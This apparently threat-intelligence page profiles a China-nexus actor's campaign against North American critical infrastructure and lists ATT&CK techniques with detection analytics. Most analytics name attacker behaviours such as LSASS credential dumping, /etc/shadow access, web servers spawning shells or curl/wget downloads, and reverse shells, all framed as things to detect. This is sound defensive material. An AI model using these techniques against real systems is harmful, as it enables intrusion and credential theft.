
UAT-8837 Critical Infrastructure Campaign in North America
Indicators of Compromise
No domains found for this campaign
APT Groups1
A China-nexus advanced persistent threat (APT) actor primarily focused on gaining initial access to high-value targets within critical infrastructure sectors. The group is characterized by its sophisticated use of zero-day vulnerabilities and its objective of harvesting sensitive organizational data, including source code and security configurations, potentially to facilitate future supply chain compromises.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1033 - System Owner/User Discovery
ID | Name | Analytic ID | Analytic Description |
Behavioral Detection of User Discovery via Local and Remote Enumeration | Adversary launches built-in system tools (e.g., whoami, query user, net user) or scripts that enumerate user account information via local execution or remote API queries (e.g., WMI, PowerShell). | ||
Adversary runs commands like whoami, id, w, or cat /etc/passwd from non-interactive or scripting contexts to enumerate system user details. | |||
Adversary uses dscl, who, or environment variables like $USER to identify accounts or sessions via Terminal or malicious LaunchAgents. | |||
Adversary executes CLI commands like show users, show ssh, or attempts to dump AAA user lists from routers or switches. |
T1003 - OS Credential Dumping
ID | Name | Analytic ID | Analytic Description |
Credential Dumping via Sensitive Memory and Registry Access Correlation | Processes accessing LSASS memory or SAM registry hives outside of trusted security tools, often followed by file creation or lateral movement. Detects unauthorized access to sensitive OS subsystems for credential extraction. | ||
Processes opening /proc//mem or /proc//maps targeting credential-storing services like sshd or login. Behavior often includes high privilege escalation and memory inspection tools such as gcore or gdb. | |||
Unsigned processes accessing system memory or launching known credential scraping tools (e.g., osascript, dylib injections) to access the Keychain or sensitive memory regions. |
T1543 - Create or Modify System Process
ID | Name | Analytic ID | Analytic Description |
Detection of System Process Creation or Modification Across Platforms | Detects command-line or API-based creation/modification of Windows Services via sc.exe, powershell.exe, services.exe, or ChangeServiceConfig. Looks for creation/modification of autostart services via registry changes, file drops to System32\services, and anomalous parent-child process trees. | ||
Detects creation or modification of systemd service units, addition of cron jobs that invoke binaries on boot, or suspicious writes to /etc/init.d/. Monitors chmod +x and systemctl execution paths, especially from non-root parent processes. | |||
Detects creation or modification of LaunchDaemon or LaunchAgent plist files under /Library/LaunchDaemons/, ~/Library/LaunchAgents/, or similar. Monitors execution of launchctl, property list edits, and file permission changes. | |||
Detects creation of new container system processes via docker run --restart, kubectl exec to init containers, or modification of container init specs. Flags container images that override entrypoints to embed persistence behaviors. |
T1133 - External Remote Services
ID | Name | Analytic ID | Analytic Description |
Behavior-chain detection for T1133 External Remote Services across Windows, Linux, macOS, Containers | Unusual or unauthorized external remote access attempts (e.g., RDP, VPN, Citrix) → repeated failed logins followed by a successful session from uncommon geolocations or outside business hours → subsequent internal lateral movement or data exfiltration activities. | ||
Repeated SSH, VPN, or RDP gateway authentication attempts from external IPs → subsequent successful logon → remote shell or lateral movement activity (e.g., scp/sftp). | |||
Unexpected inbound or outbound VNC/SSH/Screen Sharing connections from external sources → repeated failed logins followed by success → remote interactive sessions or abnormal file transfers. | |||
Connections to exposed container services (e.g., Docker API, Kubernetes API server) from unauthorized external IPs → abnormal container creation/start → lateral activity within cluster nodes. |
T1069 - Permission Groups Discovery
ID | Name | Analytic ID | Analytic Description |
Detection of adversary enumeration of domain or local group memberships via native tools such as net.exe, PowerShell, or WMI. This activity may precede lateral movement or privilege escalation. | |||
Detection of group enumeration using commands like 'id', 'groups', or 'getent group', often followed by privilege escalation or SSH lateral movement. | |||
Group membership checks via 'dscl', 'dscacheutil', or 'id', typically executed via terminal or automation scripts. |
T1082 - System Information Discovery
ID | Name | Analytic ID | Analytic Description |
Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration. | |||
Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts. | |||
Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes. | |||
Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell. | |||
Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets. | |||
Execution of show version, show hardware, or show system commands through CLI via SSH or console. |
T1190 - Exploit Public-Facing Application
ID | Name | Analytic ID | Analytic Description |
Adversary sends crafted HTTP/S (or other service) input to an Internet-facing app (IIS/ASP.NET, API, device portal). Chain: (1) abnormal request patterns to public endpoint → (2) elevated 4xx/5xx or unusual methods/paths → (3) server process (w3wp.exe/other service) spawns shell/LOLbins or loads non-standard modules → (4) optional outbound callback from the host/container. | |||
Adversary exploits Apache/Nginx/app servers. Chain: (1) suspicious requests in access logs → (2) spike of 5xx or WAF blocks → (3) web server or interpreter (apache2/nginx/php-fpm/node/python) spawns /bin/sh, curl, wget, socat, or writes webshell → (4) outbound callback. | |||
Adversary targets macOS-hosted public services (e.g., nginx, node). Chain: suspicious inbound request → service crash/5xx → service spawns shell or writes file → new outbound connection. | |||
Adversary exploits containerized app via ingress or service. Chain: (1) suspicious request in ingress/app logs → (2) container process spawns a shell/exec/sidecar (kubectl exec/docker exec) → (3) egress to Internet or metadata service (169.254.169.254). | |||
Adversary targets cloud-hosted public endpoints. Chain: (1) ALB/ELB/Cloud LB logs show exploit-like inputs or error spikes → (2) workload spawns shell or reaches metadata API → (3) egress to new external hosts. | |||
Adversary exploits exposed OpenSLP on ESXi or vCenter public endpoints. Chain: inbound request pattern to mgmt service → hostd/vpxd error/crash/restart → unexpected process behavior or datastore access → outbound callback. | |||
Adversary exploits public admin services on routers/firewalls/switches. Chain: anomalous HTTP/SNMP/SmartInstall inputs → device syslog errors/restarts → config changes/CLI spawn → egress to attacker C2. |
T1558 - Steal or Forge Kerberos Tickets
ID | Name | Analytic ID | Analytic Description |
Detects anomalous Kerberos activity such as forged or stolen tickets by correlating malformed fields in logon events, RC4-encrypted TGTs, or TGS requests without corresponding TGT requests. Also detects suspicious processes accessing LSASS memory for ticket extraction. | |||
Detects suspicious access to SSSD secrets database and Kerberos key material indicating ticket theft or replay attempts. Correlates anomalous file access with unusual Kerberos service ticket requests. | |||
Detects attempts to forge or replay Kerberos tickets by monitoring Unified Logs for anomalous kinit/klist activity and correlating unusual authentication sequences. |
T1550 - Use Alternate Authentication Material
ID | Name | Analytic ID | Analytic Description |
Behavioral Detection Strategy for Use Alternate Authentication Material (T1550) | Use of stolen Kerberos tickets or token impersonation resulting in logon sessions from accounts without expected interactive logon events. | ||
Access tokens or SSH keys used without corresponding login shell or PAM module activity, particularly for remote execution. | |||
Token replay or impersonation in federated logins without interactive browser session or MFA prompts. | |||
Unusual reuse of OAuth access tokens from different geographic regions, without full login events. | |||
Container process uses mounted cloud credentials or token cache to authenticate without known orchestration. | |||
Access token reuse to connect to SharePoint or Outlook APIs without interactive user context. | |||
Use of instance metadata tokens across instances or misuse of short-lived tokens issued for different roles. |
T1021 - Remote Services
ID | Name | Analytic ID | Analytic Description |
Behavioral Detection Strategy for Remote Service Logins and Post-Access Activity | Logon via RDP or WMI by a user account followed by uncommon command execution, file manipulation, or lateral network connections. | ||
SSH session from new source IP followed by interactive shell or privilege escalation (e.g., sudo, su) and outbound lateral connection. | |||
Remote login via ARD or SSH followed by screensharingd process activity or modification of TCC-protected files. | |||
Use of cloud-based bastion or VM console session followed by commands that initiate outbound SSH or RDP sessions from the cloud instance to other environments. | |||
vSphere API logins (vimService) or SSH to ESXi host followed by unauthorized shell commands or lateral remote logins from the ESXi host. |
T1016 - System Network Configuration Discovery
ID | Name | Analytic ID | Analytic Description |
Behavioral Detection of System Network Configuration Discovery | Execution of built-in tools (e.g., ipconfig, route, netsh) or PowerShell/WMI queries to enumerate IP, MAC, interface status, or routing configuration. | ||
Execution of ifconfig, ip a, or access to /proc/net/ indicating collection of local interface and route configuration. | |||
Execution of ifconfig, networksetup, or system_profiler to query IP/MAC/interface configuration and status. | |||
Use of esxcli network commands (e.g., esxcli network nic list, esxcli network ip interface ipv4 get) via SSH or hostd to enumerate adapter and IP information. | |||
CLI-based execution of interface and routing discovery commands (e.g., show ip interface, show arp, show route) over Telnet, SSH, or console. |
T1087 - Account Discovery
ID | Name | Analytic ID | Analytic Description |
Detection of suspicious enumeration of local or domain accounts via command-line tools, WMI, or scripts. | |||
Enumeration of users and groups through suspicious shell commands or unauthorized access to /etc/passwd or /etc/shadow. | |||
Detection of user account enumeration through tools like dscl, dscacheutil, or loginshell enumeration via command-line. | |||
Detection of API calls listing users, IAM roles, or groups in cloud environments. | |||
Enumeration of user or role objects via IdP API endpoints or LDAP queries. | |||
Account enumeration via esxcli, vim-cmd, or API calls to vSphere. | |||
Account enumeration via bulk access to user directory features or hidden APIs. | |||
Account discovery via VBA macros, COM objects, or embedded scripting. |
T1083 - File and Directory Discovery
ID | Name | Analytic ID | Analytic Description |
Recursive Enumeration of Files and Directories Across Privilege Contexts | Execution of file enumeration commands (e.g., 'dir', 'tree') from non-standard processes or unusual user contexts, followed by recursive directory traversal or access to sensitive locations. | ||
Use of file enumeration commands (e.g., 'ls', 'find', 'locate') executed by suspicious users or scripts accessing broad file hierarchies or restricted directories. | |||
Execution of file or directory discovery commands (e.g., 'ls', 'find') from terminal or script-based tooling, especially outside normal user workflows. | |||
Execution of esxcli commands to enumerate datastore, configuration files, or directory structures by unauthorized or remote users. | |||
Execution of file discovery commands (e.g., 'dir', 'show flash', 'nvram:') from CLI interfaces, especially by unauthorized users or from abnormal source IPs. |
T1049 - System Network Connections Discovery
ID | Name | Analytic ID | Analytic Description |
Detection of System Network Connections Discovery Across Platforms | Detects usage of commands or binaries (e.g., netstat, PowerShell Get-NetTCPConnection) and WMI or API calls to enumerate local or remote network connections. | ||
Detects use of netstat, ss, lsof, or custom shell scripts to list current network connections. Often paired with privilege escalation or staging. | |||
Detects shell-based enumeration of active connections using netstat, lsof -i, or AppleScript-based system discovery. | |||
Detects shell or API usage of esxcli network ip connection list or netstat to enumerate ESXi host connections. | |||
Detects interactive or automated use of CLI commands like show ip sockets, show tcp brief, or SNMP queries for active sessions on routers/switches. | |||
Detects enumeration of cloud network interfaces, VPCs, subnets, or peer connections using CLI or SDKs (e.g., AWS CLI, Azure CLI, GCloud CLI). |
T1057 - Process Discovery
ID | Name | Analytic ID | Analytic Description |
Identifies adversary behavior that launches commands or invokes APIs to enumerate active processes (e.g., tasklist.exe, Get-Process, or CreateToolhelp32Snapshot). Detects execution combined with parent process lineage, network session context, or remote origin. | |||
Detects execution of common process enumeration utilities (e.g., ps, top, htop) or access to /proc with suspicious ancestry. Correlates command usage with interactive shell context and user role. | |||
Monitors execution of ps, top, or launchctl with unusual parent processes or from terminal scripts. Also detects AppleScript-based process listing or system_profiler SPApplicationsDataType misuse. | |||
Detects process enumeration using esxcli system process list or ps on ESXi shell or via unauthorized SSH sessions. Correlates with interactive sessions and abnormal user roles. | |||
Monitors CLI-based execution of show process or equivalent on routers/switches. Correlates unusual device access, unauthorized roles, or config mode changes. |
T1098 - Account Manipulation
ID | Name | Analytic ID | Analytic Description |
Account attribute changes (e.g., password set, group membership, servicePrincipalName, logon hours) correlated with unusual process lineage or timing, indicating privilege escalation or persistence via valid accounts. | |||
Use of native tools or scripting (e.g., usermod, passwd, groupmod) to escalate permissions or persist access on existing users, correlated with login or process events. | |||
Modifications to user accounts via dscl, pwpolicy, or System Preferences CLI (sysadminctl) that alter user groups, enable root, or bypass MDM restrictions. | |||
Modifications to SSO/SAML user attributes (e.g., isAdmin, role, MFA bypass, App assignments) often through CLI, API, or rogue IdP apps. | |||
Addition of new users or changes to role permissions (e.g., ReadOnly -> Admin) via API or vSphere Client, particularly from non-jumpbox IPs. | |||
Role escalation (e.g., Editor → Owner) in cloud collaboration tools (Google Workspace, O365) or file sharing apps to maintain elevated access. |
T1078 - Valid Accounts
ID | Name | Analytic ID | Analytic Description |
Detection of compromised or misused valid accounts via anomalous logon patterns, abnormal logon types, and inconsistent geographic or time-based activity across Windows endpoints. | |||
Detection of valid account misuse through SSH logins, sudo/su abuse, and service account anomalies outside expected patterns. | |||
Detection of interactive and remote logins by service accounts or users at unusual times, with unexpected child process activity. | |||
Detection of valid account abuse in IdP logs via geographic anomalies, impossible travel, risky sign-ins, and multiple MFA attempts or failures. | |||
Detection of containerized service accounts or compromised kubeconfigs being used for cluster access from unexpected nodes or IPs. |
T1505 - Server Software Component
ID | Name | Analytic ID | Analytic Description |
Installation of malicious IIS/Apache/SQL server modules that later execute command-line interpreters or establish outbound connections. | |||
Abuse of extensible server modules (e.g., Apache, Nginx, Tomcat) to load rogue plugins that initiate bash, connect to C2, or spawn reverse shells. | |||
Malicious use of webserver plugins (e.g., for nginx, PHP, Node.js) that execute AppleScript or open network sockets. | |||
Use of ESXi web interface plugins or vSphere extensions to embed persistent malicious scripts or services. |
T1018 - Remote System Discovery
ID | Name | Analytic ID | Analytic Description |
Execution of network enumeration utilities (e.g., net.exe, ping.exe, tracert.exe) in short succession, often chained with lateral movement tools or system enumeration commands. | |||
Use of bash scripts or interactive shells to issue sequential ping, arp, or traceroute commands to map remote hosts. | |||
Execution of built-in or AppleScript-based system enumeration via arp, netstat, ping, and discovery of /etc/hosts contents. | |||
ESXi shell or SSH access issuing esxcli network diag ping or viewing routing tables to identify connected hosts. | |||
Execution of discovery commands like show cdp neighbors, show arp, and other interface-level introspection on Cisco or Juniper devices. |
T1105 - Ingress Tool Transfer
ID | Name | Analytic ID | Analytic Description |
Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded). | |||
Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk. | |||
Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories. | |||
Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories. | |||
Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks. |